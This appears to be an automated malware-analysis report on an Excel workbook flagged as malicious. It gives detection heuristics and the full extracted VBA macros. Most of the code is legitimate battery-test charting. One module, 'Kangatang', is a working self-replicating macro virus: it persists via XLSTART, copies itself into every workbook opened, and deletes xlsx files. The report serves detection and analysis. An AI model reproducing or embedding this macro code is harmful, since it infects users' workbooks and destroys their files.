MALICIOUS
284
Risk Score
Heuristics 8
-
ClamAV: Xls.Malware.ExcelSic-10004731-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.ExcelSic-10004731-1
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set d = CreateObject("Scripting.Dictionary") -
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCEThe macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.Matched line in script
'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls" -
VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADERThe macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.Matched line in script
Application.OnSheetActivate = "" -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub Auto_Close() -
Hidden worksheet (veryHidden) low OOXML_HIDDEN_SHEETExcel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 14908 bytes |
SHA-256: f759662c3154b7180863e7218c6a288a4d64de42af1de16e3e93e7493a4dbfb3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "St3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Storage_Aluminum"
Sub Report_Main()
Dim sht As Worksheet
Storage_Alu_Voltage_IMP_THK
Storage_Alu_CAP
For Each sht In Sheets
If sht.Name Like "DCR Data*" Then sht.Activate: Storage_Alu_DCR sht
Next sht
Storage_Alu_CU
End Sub
Sub Storage_Alu_Voltage_IMP_THK()
arrTitle = Array(, "电压(V)", "内阻(mΩ)", "厚度/mm", "重量/g", "厚度变化率(%)")
ChartCols = Array(, 1, 2, 3, 4, 7)
arrCategoryTitle = Array(, "Day", "Day", "Day", "Day", "Day")
arrValueTitle = Array(, "电压(V)", "内阻(mΩ)", "厚度/mm", "重量/g", "厚度变化率(%)")
CurvesSet "Voltage_IMP_THK Data", 2, 4, ChartCols, arrTitle, arrCategoryTitle, arrValueTitle, , , , 4, 4
End Sub
Sub Storage_Alu_Voltage()
arrTitle = Array(, "入柜前电压趋势图")
ChartCols = Array(, 2)
arrCategoryTitle = Array(, "Day")
arrValueTitle = Array(, "电压(V)")
CurvesSet "入柜前Voltage", 1, 1, ChartCols, arrTitle, arrCategoryTitle, arrValueTitle, , , , 4, 1
End Sub
Sub Storage_Alu_DCR(sht As Worksheet)
arrTitle = Array(, "CC_DCR增长图", "DC_DCR增长图", "正极接触内阻 曲线", "负极接触内阻 曲线")
ChartCols = Array(, 1, 9, 17, 18)
arrCategoryTitle = Array(, "Day", "Day", "Day", "Day")
arrValueTitle = Array(, "CC_DCR/mΩ", "DC_DCR/mΩ", "正极接触内阻", "负极接触内阻")
arrTitle1 = Array(, "正极接触内阻 曲线", "负极接触内阻 曲线", "CC_DCR增长图", "DC_DCR增长图")
ChartCols1 = Array(, 17, 18, 1, 9)
arrValueTitle1 = Array(, "正极接触内阻", "负极接触内阻", "CC_DCR/mΩ", "DC_DCR/mΩ")
CurvesSet sht.Name, 2, 2, ChartCols, arrTitle, arrCategoryTitle, arrValueTitle, , , , 11, 2
CurvesSet sht.Name, 2, 4, ChartCols1, arrTitle1, arrCategoryTitle, arrValueTitle1, , False, , 11, 2, 750, , False
End Sub
Sub Storage_Alu_CU()
arrTitle = Array(, "CU拟合值 曲线图")
ChartCols = Array(, 1)
arrCategoryTitle = Array(, "Day")
arrValueTitle = Array(, "CU拟合值")
CurvesSet "CU", 2, 1, ChartCols, arrTitle, arrCategoryTitle, arrValueTitle, , , , 4, 2
CurvesSet "CU", 2, 1, ChartCols, arrTitle, arrCategoryTitle, arrValueTitle, , False, , 4, 2, 400, , False
End Sub
Sub Storage_Alu_CAP()
arrTitle = Array(, "残余容量 曲线", "恢复容量 曲线", "正极接触内阻 曲线", "负极接触内阻 曲线")
ChartCols = Array(, 1, 2, 5, 6)
arrCategoryTitle = Array(, "Day", "Day", "Day", "Day")
arrValueTitle = Array(, "残余容量", "恢复容量", "正极接触内阻", "负极接触内阻")
arrTitle1 = Array(, "正极接触内阻 曲线", "负极接触内阻 曲线", "残余容量 曲线", "恢复容量 曲线")
ChartCols1 = Array(, 5, 6, 1, 2)
arrValueTitle1 = Array(, "正极接触内阻", "负极接触内阻", "残余容量", "恢复容量")
CurvesSet "Process CAP Data", 3, 2, ChartCols, arrTitle, arrCategoryTitle, arrValueTitle, , , , 11, 3
CurvesSet "Process CAP Data", 3, 4, ChartCols1, arrTitle1, arrCategoryTitle, arrValueTitle1, , False, , 11, 3, 750, , False
End Sub
Sub DelChar(sht As Worksheet)
On Error Resume Next
For Each shp In sht.Shapes
' If shp.Name <> "Picture 1" Then shp.Delete
shp.Delete
Next shp
On Error GoTo 0
End Sub
Function FindSheet(sht As String) As Boolean
For Each sh In Worksheets
If sh.Name = sht Then FindSheet = True: Exit Function Else FindSheet = False
Next sh
End Function
Function Groups(Grp As String, Optional isGrp = True, Optional dic)
Dim sht As Worksheet, c As Object
Set d = CreateObject("Scripting.Dictionary")
Set sht = Sheets("Summary")
' Set c = sht.Cells.Find(Grp, , xlValues, xlWhole)
Set c = sht.Cells.Find(What:=Grp, LookIn:=xlValues, LookAt:= _
xlWhole, SearchOrder:=xlByRows, SearchDirection:=xlNext, MatchCase:=False _
, MatchByte:=False, SearchFormat:=False)
i = 0
Do
i = i + 1
t = c.Offset(i, 0)
If t = "" Then Exit Do
t1 = c.Offset(i, -1)
If isGrp = False Then
d(t1) = t1
Else
If Not d.Exists(t) Then d(t) = t1 Else d(t) = d(t) & "|" & t1
End If
Loop
Set dic = d
End Function
Sub CurvesSet(xname As String, xcol As Integer, ChtCnts As Integer, ChartCols, arrTitle, arrCategoryTitle, arrValueTitle, _
Optional MajorUnt = 0, Optional isGroup As Boolean = True, Optional AxesPrimaryNumFromat = "0.00", _
Optional startRow = 4, Optional startCol = 1, Optional LfPoint = 30, Optional tubiaoweizhi = 0, Optional isDelChart = True)
Dim sht As Worksheet
Dim ChartObj As ChartObject, newChart As Chart
Dim col As Long, rw As Long
Dim c As Object, tm 'd As New Scripting.Dictionary
Dim actWb As Workbook
On Error Resume Next
Set actWb = ThisWorkbook
Set sht = actWb.Sheets(xname)
Call Groups("组别", isGroup, d)
sht.Activate
If ActiveSheet.ChartObjects.Count > 0 And isDelChart = True Then ActiveSheet.ChartObjects.Delete
If tubiaoweizhi = 0 Then tubiaoweizhi = sht.Cells(sht.Cells(10000, 1).End(xlUp).Row + 5, 1).top
rw = sht.Cells(10000, xcol).End(xlUp).Row
For i = 1 To IIf(isGroup = True, d.Count, 1) '组数
tms = d.Items
kys = d.Keys
tm = Split(tms(i - 1), "|")
' Debug.Print tm(i - 1), d.Keys(i - 1)
For ChtCnt = 1 To ChtCnts '每组图表数
If isGroup = False And ChtCnts = 1 Then
Set ChartObj = sht.ChartObjects.Add(LfPoint, tubiaoweizhi, 350, 220)
ElseIf ChtCnts = 1 And isGroup = True Then
Set ChartObj = sht.ChartObjects.Add(LfPoint, tubiaoweizhi + (i - 1) * 230, 350, 220)
ElseIf isGroup = False Then
Set ChartObj = sht.ChartObjects.Add(LfPoint + (ChtCnt - 1) * 360, tubiaoweizhi, 350, 220)
Else
Set ChartObj = sht.ChartObjects.Add(LfPoint + (ChtCnt - 1) * 360, tubiaoweizhi + (i - 1) * 230, 350, 220) '图表坐标,图表大小
End If
Set newChart = ChartObj.Chart
With newChart
.ChartWizard Source:=sht.Range("P1:Q1"), gallery:=xlLineMarkers, PlotBy:=xlColumns, HasLegend:=True, _
Title:=IIf(isGroup = False, "", kys(i - 1) & "-") & arrTitle(ChtCnt), _
CategoryTitle:=arrCategoryTitle(ChtCnt), _
ValueTitle:=arrValueTitle(ChtCnt)
.Axes(xlValue).TickLabels.NumberFormatLocal = AxesPrimaryNumFromat
For Each oSeries In .SeriesCollection '初始化图表区
oSeries.Delete
Next
For j = 1 To (UBound(tm) + 1) * IIf(isGroup = False, d.Count, 1) '曲线数
txt = kys(j - 1)
If isGroup = True Then Set c = Rows("1:8").Find(tm(j - 1), , xlValues) Else Set c = Rows("1:8").Find(txt, , xlValues)
If Not c Is Nothing Then col = c.Column Else c = startCol
If col = 0 Then Exit For
' rw = Cells(100000, col).End(xlUp).Row
If isGroup = False Then strTitle = txt Else strTitle = kys(i - 1) & "-" & tm(j - 1)
col = col + ChartCols(ChtCnt) - 1
.SeriesCollection.NewSeries
.FullSeriesCollection(j).Name = strTitle
.FullSeriesCollection(j).XValues = "='" & xname & "'!" & sht.Range(sht.Cells(startRow, xcol), sht.Cells(rw, xcol)).Address
.FullSeriesCollection(j).Values = "='" & xname & "'!" & sht.Range(sht.Cells(startRow, col), sht.Cells(rw, col)).Address
.FullSeriesCollection(j).ChartType = xlLineMarkers
.FullSeriesCollection(j).MarkerSize = 5
.FullSeriesCollection(j).MarkerStyle = xlMarkerStyleCircle
' .Axes(xlCategory).AxisTitle.Delete
col = 0
Next j
SetCategory newChart, 60, sht.Cells(4, 2), sht.Cells(rw + 1, 2), MajorUnt
End With
Next ChtCnt
Next i
On Error GoTo 0
End Sub
Sub setFormatConditions(rng As Range)
Cells.FormatConditions.Delete
With rng
Range("H11:I12").Select
.FormatConditions.Add Type:=xlExpression, Formula1:= _
"=if(or(" & rng.Cells(1, 1).Address(0, 1) & "-" & rng.Cells(1, 2).Address(0, 1) & ">0.1," & rng.Cells(1, 1).Address(0, 1) & "-" & rng.Cells(1, 2).Address(0, 1) & "<-0.1),true,false)"
.FormatConditions(Selection.FormatConditions.Count).SetFirstPriority
With .FormatConditions(1).Interior
.PatternColorIndex = xlAutomatic
.Color = 255
.TintAndShade = 0
End With
.FormatConditions(1).StopIfTrue = False
End With
End Sub
Function SetCategory(cht As Chart, Optional ticklabel As Integer = 0, Optional min = 0, Optional max = 0, Optional MajorUnt = 0, Optional NumberFormat = 0, Optional CategoryType = xlAutomatic)
With cht.Axes(xlCategory)
.TickLabels.Orientation = ticklabel
If min <> 0 Then .MinimumScale = Val(min)
If max <> 0 Then .MaximumScale = max
If MajorUnt <> 0 Then .MajorUnit = MajorUnt
If CategoryType <> 0 Then .CategoryType = CategoryType
If NumberFormat <> 0 Then .TickLabels.NumberFormatLocal = NumberFormat
End With
End Function
Function SetLegend(cht As Chart, left, top, width, height, Optional SetElmnt = msoElementLegendRight)
With cht
.SetElement (SetElmnt)
.Legend.left = left
.Legend.top = top
.Legend.width = width
.Legend.height = height
End With
End Function
Function SetPlotArea(cht As Chart, left, top, width, height)
With cht
.PlotArea.left = left
.PlotArea.top = top
.PlotArea.width = width
.PlotArea.height = height
End With
End Function
Attribute VB_Name = "Kangatang"
Sub Auto_Open()
'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls"
Application.DisplayAlerts = False
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath Then
Application.ScreenUpdating = False
Windows(1).Visible = False
ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\mypersonnel.xls"
Windows(1).Visible = True
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "mypersonnel.xls!allocated"
End Sub
Sub Auto_Close()
On Error Resume Next
Application.DisplayAlerts = False
If Right(ThisWorkbook.Name, 4) <> "xlsx" Or Application.Version <= 11 Then Exit Sub
ThisWorkbook.SaveAs Filename:=ThisWorkbook.Path & "\" & Replace(ThisWorkbook.Name, ".xlsx", ".xls"), _
FileFormat:=xlExcel8, Password:="", WriteResPassword:="", _
ReadOnlyRecommended:=False, CreateBackup:=False
Kill ThisWorkbook.Path & "\" & Replace(ThisWorkbook.Name, ".xls", ".xlsx")
End Sub
Sub allocated()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "Kangatang" Then
Application.ScreenUpdating = False
currentsh = ActiveSheet.Name
ThisWorkbook.Sheets("Kangatang").Copy before:=ActiveWorkbook.Sheets(1)
ActiveWorkbook.Sheets(currentsh).Select
Application.ScreenUpdating = True
End If
End Sub
Attribute VB_Name = "Sheet8"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 69632 bytes |
SHA-256: cfdec97cafa3ec693ba6435d7e174fb6b2d6e7af8ba026ffcfb9626ef4139ca2 |
|||
|
Detection
ClamAV:
Xls.Malware.ExcelSic-10004731-1
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.